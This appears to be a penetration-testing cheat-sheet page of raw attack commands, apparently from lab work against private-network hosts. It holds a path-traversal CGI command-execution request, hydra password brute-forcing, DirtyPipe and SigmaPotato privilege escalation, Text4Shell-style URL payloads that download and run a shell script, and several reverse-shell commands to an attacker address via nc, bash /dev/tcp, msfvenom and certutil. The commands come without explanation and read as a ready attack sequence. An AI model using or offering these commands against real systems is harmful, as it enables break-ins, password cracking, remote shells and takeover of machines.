search

Misc

curl -s --path-as-is -d "echo Content-Type: text/plain; echo; whoami" "192.168.231.149/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2";

hydra -l kiero -P /usr/share/wordlists/rockyou.txt ftp://192.168.231.149

hydra -l kiero -P /usr/share/wordlists/rockyou.txt ssh://192.168.231.149

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash 

CVE-2022-0847 (DirtyPipe)
curl http://192.168.45.166/50808.c -o priv.c
gcc priv.c -o exploit1
find / -perm -4000 2>/dev/null
./exploit1 /home/john/RESET_PASSWD

---------------
python textshell2.py -u 'http://192.168.245.150:8080/search?query=' -c 'whoami' -m 'rce'


sudo tcpdump -i tun0 
http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27ping%20192.168.45.166%27)%7D HTTP/1.1

http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27wget%20192.168.45.166/testshell%20-O%20/tmp/testshell%27)%7D HTTP/1.1

http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27sh%20/tmp/testshell%27)%7D HTTP/1.1
http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27sh%20/tmp/testshell%27)%7D%20HTTP/1.1

ssh -R 5555:127.0.0.1:8000 -vv -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null [email protected] 

ssh-keygen -t rsa -f ~/.ssh/id_rsa
cat ~/.ssh/id_rsa.pub >> /home/kali/.ssh/authorized_keys
wget http://192.168.45.166/id_rsa -O id_rsa
ssh -i id_rsa -R 5555:127.0.0.1:8000 -vv -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null [email protected] 

nmap -sV -Pn -n -p 5555 --script=banner 127.0.0.1 

$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "ncat -v -l -p 1234 -e /bin/bash"
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "nc -e /bin/bash 192.168.45.166 2233"
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "ncat -v -l -p 1234 -e /bin/bash"
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "bash -c 'bash -i >& /dev/tcp/192.168.45.166/2233 0>&1'"


wget http://192.168.45.166/linpeas.sh -O /tmp/linpeas.sh

wget http://192.168.45.166/41154.sh -o lpe.sh

[+] [CVE-2021-3156] sudo Baron Samedit 2
[+] [CVE-2021-3156] sudo Baron Samedit
[+] [CVE-2021-4034] PwnKit

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

python3 ~/Downloads/AutoRecon-main/autorecon.py 192.168.245.151
python3 free.py 192.168.245.151 'type c:\users\chris\Desktop\local.txt'
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.166 LPORT=443 -f exe -o 2shell.exe
python3 free.py 192.168.245.151 'certutil.exe -urlcache -split -f http://192.168.45.166/2shell.exe c:\users\public\2shell.exe'
python3 free.py 192.168.245.151 'c:\users\public\2shell.exe'

iwr -uri http://192.168.45.166/winPEASx64.exe -Outfile wpeas.exe
.\nc.exe 192.168.45.166 1337 -e cmd


iwr -uri http://192.168.45.166/SigmaPotato.exe -Outfile sp.exe
.\sp.exe "nc.exe 192.168.45.166 2337 -e cmd"

Service Changes:

https://www.scribd.com/document/751477610/Pascha-Mobile-Mouse-Server-9099-Metasploit-Privilege-Escalation-Overwriting-Service-Windows-docxarrow-up-right

hashtag
TAR Number:

PreviousSQL Injection BypassNextReferences

Last updated